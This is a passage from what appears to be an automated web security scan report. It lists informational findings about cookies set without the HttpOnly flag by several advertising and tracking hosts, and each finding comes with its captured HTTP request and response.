ih="b!!!!>!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!$p!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!(<xt]T!!0O<!!!!-<xt]T!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!.<xt]T!!J<E!!!!.<xt]T!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!/<xt]T!!q:E!!!!,<xt]T!!q<+!!!!-<xt]T!!q</!!!!-<xt]T!!q<3!!!!-<xt]T!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xqZB!!ucq!!!!-<xt]T!!vRm!!!!(<xt]T!!vRq!!!!(<xt]T!!vRr!!!!(<xt]T!!vRw!!!!-<xt]T!!vRx!!!!(<xt]T!!vRy!!!!(<xt]T!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!(<xt]T!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3_i!!!!#<yMiw!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!(<xt]T!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!(<xt]T!#7.'!!!!(<xt]T!#7.:!!!!(<xt]T!#7.O!!!!(<xt]T!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!(<xt]T!#MTF!!!!(<xt]T!#MTH!!!!(<xt]T!#MTI!!!!(<xt]T!#MTJ!!!!(<xt]T!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!.<xt]T!#SF3!!!!.<xt]T!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!(<xt]T!#UDP!!!!.<xt]T!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!(<xt]T!#ai7!!!!(<xt]T!#ai?!!!!(<xt]T!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c?c!!!!(<xt]T!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!(<xt]T!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!(<xt]T!#tM)!!!!(<xt]T!#tn2!!!!(<xt]T!#uE=!!!!#<x9#K!#uJY!!!!.<xt]T!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!(<xt]T!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!+<xt]T!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#R7!!!!(<xt]T!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!(<xt]T!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(Gt!!!!+<xt]T!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:33:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!$q!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!(<xt]T!!0O<!!!!-<xt]T!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!#<yP8D!!?VS!!B1c<xl.o!!J<=!!!!.<xt]T!!J<E!!!!.<xt]T!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!/<xt]T!!q:E!!!!,<xt]T!!q<+!!!!-<xt]T!!q</!!!!-<xt]T!!q<3!!!!-<xt]T!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xqZB!!ucq!!!!-<xt]T!!vRm!!!!(<xt]T!!vRq!!!!(<xt]T!!vRr!!!!(<xt]T!!vRw!!!!-<xt]T!!vRx!!!!(<xt]T!!vRy!!!!(<xt]T!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!(<xt]T!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3_i!!!!#<yMiw!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!(<xt]T!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!(<xt]T!#7.'!!!!(<xt]T!#7.:!!!!(<xt]T!#7.O!!!!(<xt]T!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!(<xt]T!#MTF!!!!(<xt]T!#MTH!!!!(<xt]T!#MTI!!!!(<xt]T!#MTJ!!!!(<xt]T!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!.<xt]T!#SF3!!!!.<xt]T!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!(<xt]T!#UDP!!!!.<xt]T!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!(<xt]T!#ai7!!!!(<xt]T!#ai?!!!!(<xt]T!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c?c!!!!(<xt]T!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!(<xt]T!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!(<xt]T!#tM)!!!!(<xt]T!#tn2!!!!(<xt]T!#uE=!!!!#<x9#K!#uJY!!!!.<xt]T!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!(<xt]T!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!+<xt]T!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#R7!!!!(<xt]T!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!(<xt]T!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(Gt!!!!+<xt]T!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; path=/; expires=Sun, 05-May-2013 22:33:37 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Fri, 06 May 2011 22:33:37 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
18.112. http://ads.adonion.com/serving/tracking_id.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adonion.com
Path:   /serving/tracking_id.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serving/tracking_id.php?b=1&UID=13047194394361&TRSTR=1&RTID= HTTP/1.1
Host: ads.adonion.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:52 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache, must-revalidate
Set-Cookie: TRUID=13047194394361; expires=Sun, 05-Jun-2011 22:03:52 GMT; path=/; domain=.adonion.com
Set-Cookie: CKTIME=1304719432; expires=Thu, 01-Mar-2012 22:03:52 GMT; path=/; domain=.adonion.com
Content-Length: 0
Connection: close
Content-Type: image/png

18.113. http://ads.allatsea.net/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.allatsea.net
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=4&campaignid=4&zoneid=1&loc=http%3A%2F%2Fallatsea.net%2F&cb=95d3582f3c HTTP/1.1
Host: ads.allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a9e7a0f4da4672bb2cdfb39a4d109071; __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:17:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a9e7a0f4da4672bb2cdfb39a4d109071; expires=Sat, 05-May-2012 21:17:42 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
18.114. http://ads.allatsea.net/www/delivery/spc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.allatsea.net
Path:   /www/delivery/spc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/spc.php?zones=zone_22_1%3D5%7Czone_22_2%3D5%7Czone_22_3%3D5%7Czone_22_4%3D5%7Czone_22_5%3D5%7Czone_22_6%3D5%7Czone_22_7%3D5%7Czone_22_8%3D5%7Czone_2%3D2%7Czone_5%3D4%7Czone_21%3D3%7Czone_1%3D1%7C&nz=1&source=&r=33221286&block=1&charset=UTF-8&loc=http%3A//allatsea.net/ HTTP/1.1
Host: ads.allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:17:36 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f0c82556887102b05119adc78f079bc2; expires=Sat, 05-May-2012 21:17:36 GMT; path=/
Content-Size: 5874
Content-Length: 5874
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['zone_22_1'] = '';
OA_output['zone_22_1'] += "<"+"a href=\'http://ads.allatsea.net/www/delivery/ck.php?oaparams=2__bannerid=15__zoneid=5__cb=9a894c70d3__oadest=
...[SNIP]...
18.115. http://adsfac.us/ag.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ag.asp?cc=ESE002.109226.0&source=js&ord=5429500 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSESE002=pctl=311033&fpt=0%2C311033%2C&pct%5Fdate=4133&FL311033=1&pctm=1&FM34983=1&pctc=34983&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 1043
Content-Type: text/javascript
Expires: Sat, 07 May 2011 01:49:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSESE002109226=uid=101121499; expires=Sun, 08-May-2011 01:50:18 GMT; path=/
Set-Cookie: FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1; expires=Tue, 07-Jun-2011 01:50:18 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 07 May 2011 01:50:17 GMT
Connection: close

if (typeof(fd_clk)=='undefined'){var fd_clk = 'http://ADSFAC.US/link.asp?cc=ESE002.109226.0&CreativeID=31430';}if(fd_clk.toLowerCase().indexOf('&creativeid=')!=-1){}else{fd_clk += '&CreativeID=31430'}
...[SNIP]...
18.116. http://ak1.abmr.net/is/media.expedia.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/media.expedia.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/media.expedia.com?U=/media/content/expus/graphics/home/wiz/wizard_booking_image.gif&V=3-AuRpyTyPuRR23jelg0laLB5Ar5FVMw71WrtlweqRnmwTqUxvVczAew%3d%3d&I=929884BBD25FA5E&D=expedia.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-EB6E52171CDEF3034828F16E1C941C3949AF262B120D03036970D01C8BD07852-53DD7F3F0623E38C5EBD95024020364994C943A39878EF266BC6AEA67E11581E

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif?01AD=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg&01RI=929884BBD25FA5E&01NA=
Expires: Fri, 06 May 2011 22:33:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 06 May 2011 22:33:42 GMT
Connection: close
Set-Cookie: 01AI=2-2-9865754352041C4D3ADB004D99DAF971A923DE02B6BBDD40E5FC7E190B49AC77-BBFBA3CA73975ED377F4F0A96413D918F3AA52C861039BDE93D7800374D5462A; expires=Sat, 05-May-2012 22:33:42 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

18.117. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/16228-124632-16454-0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/16228-124632-16454-0?mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Mon, 6-May-2013 4:19:15 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f
Content-Length: 0
Date: Fri, 06 May 2011 21:50:11 GMT

18.118. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=24459574 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
X-PHX: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
